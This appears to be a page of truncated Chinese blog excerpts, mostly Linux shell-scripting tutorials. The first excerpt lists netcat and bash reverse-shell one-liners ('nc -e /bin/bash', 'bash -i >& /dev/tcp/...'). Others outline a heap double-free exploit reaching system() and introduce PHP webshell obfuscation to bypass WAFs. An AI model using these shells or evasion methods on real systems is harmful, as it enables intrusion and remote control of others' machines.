1.NC反弹shell 1.1.正向反弹shell 服务器 nc -lvvp 7777 -e /bin/bash 攻击机 nc  server-ip 7777 1.2.反向反弹shell 攻击机 nc -lvvp 7777 服务器 nc -e /bin/bash Client-ip 7777 1.3.不带-e反弹: 2. bash反弹shell 2.1 bash -i 攻击机 nc -lvvp 7777 服务器 bash -i >& /dev/tcp/Client-IP/7777 0>…

一 判断 -d 测试是否为目录.-f 判断是否为文件. -s 判断文件是否为空 如果不为空 则返回0,否则返回1 -e 测试文件或目录是否存在. -r 测试当前用户是否有权限读取. -w 测试当前用户是否有权限写入. -x 测试当前用户是否有权限执行. 语法: [ -d /etc/fstab ] 且 或 非 && 逻辑的与,"而且"的意思. || 逻辑的或,"或者"的意思. ! 逻辑的否 [ $USER != root ] && ec…

一 判断 -d 测试是否为目录.-f 判断是否为文件. -s 判断文件是否为空 如果不为空 则返回0,否则返回1 -e 测试文件或目录是否存在. -r 测试当前用户是否有权限读取. -w 测试当前用户是否有权限写入. -x 测试当前用户是否有权限执行. 语法: [ -d /etc/fstab ] 且 或 非 && 逻辑的与,"而且"的意思. || 逻辑的或,"或者"的意思. ! 逻辑的否 [ $USER != root ] && ec…

变量的意义 我们在使用Linux命令或脚本的时候,会有一些输出,那么这些输出的信息可以用变量临时存储,以备我们下一条命令或脚本使用. 变量的定义 变量的定义建议用一个有意义的英文单词来代表变量,不要使用简单的字母a,b 这类的变量名定义.因为我们写好Shell脚本实际上是要给人看的,所以我们定义好的变量,是希望变量有具体的含义,能让阅读Shell脚本人能轻松的明白. 变量的命名规则: 字母.数字.下划线 不以数字开头 变量的赋值 为变量赋值的过程,称为变量替换 Shell脚本里变量是不区分变量类…

目录 漏洞原理 二次释放 如何在第二次释放前修改函数地址 fastbin的特性 修改函数指针流程 如何获得进程的加载基址 格式化字符串漏洞 确定printf函数在代码段中偏移 printf函数输出想要的地址 如何获得system函数的地址 寻找一个被fheap进程调用并且和system函数处于同一个so库的函数A 通过读取函数A在got.plt中相应位置的值获得函数A的地址 通过读取dynsym段中的信息计算system相对于函数A在so库中的偏移 实际运行效果 小结 参考资料 漏洞原理 程序自…

"为了从事创造性工作,人类需要孤独,可是在孤独中,广义的人类仍存在于内心."--(德国)奥铿                                                uninx, linux的初衷是不使用图形界面,而是使用commnd line,随着不断发展,command line不断壮大,shell对lilnux来说是一个非常重要的部分,对于自动完成一些任务是非常方便的! 为什么用shell? 首先,shell编程方便,快捷,另外,最基本的linux系统中也可…

前言 这篇文章写一些php木马免杀的一些技巧,希望对大家有点帮助.这里解释一下什么是php木马,这里大体分为三种: 能完成写入文件.列目录.查看文件.执行一些系统命令等少量功能的,这种的是"小马". 可以在目标服务器上执行php代码,并和一些客户端(如菜刀.冰蝎)进行交互的一句话木马. 根据 PHP 语法,编写较多代码,并在服务器上执行,完成大量间谍功能的"大马" 以上php木马我们一般我们统称为webshell,这篇文章主要写一下如何对一句话木马变异变形来绕过WA…

技巧小结: 字符串比较用双中括号[[ ]]:算数比较用单中括号[ ]——左右留空格 算数运算用双小括号(( )) :shell命令及输出用小括号( )——左右不留空格 快速替换用花括号{ }——左右留空格 反单引号起着命令替换的作用` ` ---------------------------------------------------------------------------------------------------------------- 单括号(): 另开命令组——小括号…

环境变量的知识小结:·变量名通常要大写.·变量可以在自身的Shell及子Shell中使用.·常用export来定义环境变量.·执行env默认可以显示所有的环境变量名称及对应的值.·输出时用“$变量名”,取消时用“unset变量名”.·书写crond定时任务时要注意,脚本要用到的环境变量最好先在所执行的Shell脚本中重新定义.·如果希望环境变量永久生效,则可以将其放在用户环境变量文件或全局环境变量文件里.…

转载:http://www.jb51.net/article/55327.htm python中执行shell命令的几个方法小结 投稿:junjie 字体:[增加 减小] 类型:转载 时间:2014-09-18 我要评论这篇文章主要介绍了python中执行shell命令的几个方法,本文一共给出3种方法实现执行shell命令,需要的朋友可以参考下 最近有个需求就是页面上执行shell命令,第一想到的就是os.system,复制代码 代码如下: os.system('cat /proc/cpuinf…